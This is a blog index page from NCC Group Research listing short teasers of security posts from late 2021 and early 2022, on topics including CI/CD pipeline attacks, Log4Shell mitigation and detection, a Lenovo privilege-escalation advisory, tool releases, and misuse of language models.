NCC Group Research Home

  • 10 real-world stories of how we’ve compromised CI/CD pipelines

    January 13, 2022 by

    by Aaron Haymore, Iain Smart, Viktor Gazdag, Divya Natesan, and Jennifer Fernick Mainstream appreciation for cyberattacks targeting continuous integration and continuous delivery/continuous deployment (CI/CD) pipelines has been gaining momentum. Attackers and defenders increasingly understand that build pipelines are highly-privileged targets with a substantial attack surface. But what are the potential weak points in a CI/CD… Read more

  • Impersonating Gamers With GPT-2

    January 12, 2022 by

    In this blog post, I’m going to recount the story of my quest to train OpenAI’s large language model, GPT-2, to create a virtual doppelganger of myself and my peers. Machine learning is one of those buzzwords that, sometimes, lives up to its reputation. As an information security professional, my go-to hobby has typically been… Read more

  • NCC Group’s 2021 Annual Research Report

    January 10, 2022 by

    Following the popularity of our first Annual Research Report in 2020, we present to you now for the second year, a summary of our public-facing security research findings from across the over 237 conference publications, technical blog posts, advisories, and tool releases published by researchers at NCC Group between January 1 2021 and December 31… Read more

  • Tool Release – insject: A Linux Namespace Injector

    January 8, 2022 by

    tl;dr Grab the release binary from our repo and have fun. Also, happy new year; 2021 couldn’t end soon enough. Background A while back, I was asked by one of my coworkers on the PSC team about ways in which to make their custom credit card data scanner cloud native to assess Kubernetes clusters. While… Read more

  • On the malicious use of large language models like GPT-3

    December 31, 2021 by

    (Or, “Can large language models generate exploits?”) While attacking machine learning systems is a hot topic for which attacks have begun to be demonstrated, I believe that there are a number of entirely novel, yet-unexplored attack-types and security risks that are specific to large language models (LMs), that may be intrinsically dependent upon things like… Read more

  • Tool Update – ruby-trace: A Low-Level Tracer for Ruby

    December 31, 2021 by

    We released ruby-trace back in August to coincide with my DEF CON 29 talk on it and parasitic tracing in general. Back then, it supported (c)Ruby 2.6 through 3.0. A few days ago, Ruby 3.1 was released. We have updated ruby-trace to add support for Ruby 3.1 and reorganized our test suite to validate our… Read more

  • Tool Release – shouganaiyo-loader: A Tool to Force JVM Attaches

    December 29, 2021 by

    Background Java Virtual Machines (JVMs) provide a number of mechanisms to inspect and modify the Java applications and the runtime they stand on. These include Java agents, JARs that are capable of modifying Java class files at runtime; and JVMTI agents, native libraries that can perform deep hooking into the innards of the JVM itself.… Read more

  • Technical Advisory – Lenovo ImController Local Privilege Escalation (CVE-2021-3922, CVE-2021-3969)

    December 15, 2021 by

    Summary The ImController service comes installed on certain Lenovo devices, for example NCC found the service installed on a ThinkPad workstation. The service runs as the SYSTEM user and periodically executes child processes which perform system configuration and maintenance tasks. Impact Elevation of privilege. An attacker can elevate their privileges to that of the SYSTEM… Read more

  • Choosing the Right MCU for Your Embedded Device — Desired Security Features of Microcontrollers

    December 15, 2021 by

    The Microcontroller Unit (MCU) is the heart of an embedded device, where the main firmware executes its instructions to carry out the system’s functions. These come in many varieties. Relatively simple microcontrollers with limited-resource processors may bundle only a few IO peripherals, a small amount of memory, and be intended to run a small real-time… Read more

  • FPGAs: Security Through Obscurity?

    December 14, 2021 by

    Background For the uninitiated, an FPGA is a field-programmable array of logic that is typically used to perform or accelerate some specific function (or functions) within a computer system. They are typically paired with a separate traditional microprocessor (or as part of a combined system-on-chip (SoC)) but can operate standalone as well. They can be… Read more

  • Public Report – WhatsApp opaque-ke Cryptographic Implementation Review

    December 13, 2021 by

    In June 2021, WhatsApp engaged NCC Group to conduct a security assessment of the ‘opaque-ke’ library, an open source Rust implementation of the OPAQUE password authenticated key exchange protocol. The protocol is designed to allow password-based authentication in such a way that a server does not actually learn the plaintext value of the client’s password,… Read more

  • log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

    December 12, 2021 by

    tl;dr Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems. . In this post, we first offer some context on the vulnerability, the… Read more

  • Log4Shell: Reconnaissance and post exploitation network detection

    Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 15th at 17:30 UTC tl;dr In the wake of the CVE-2021-44228, CVE-2021-45046 and CVE-2021-44832 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in… Read more

View all posts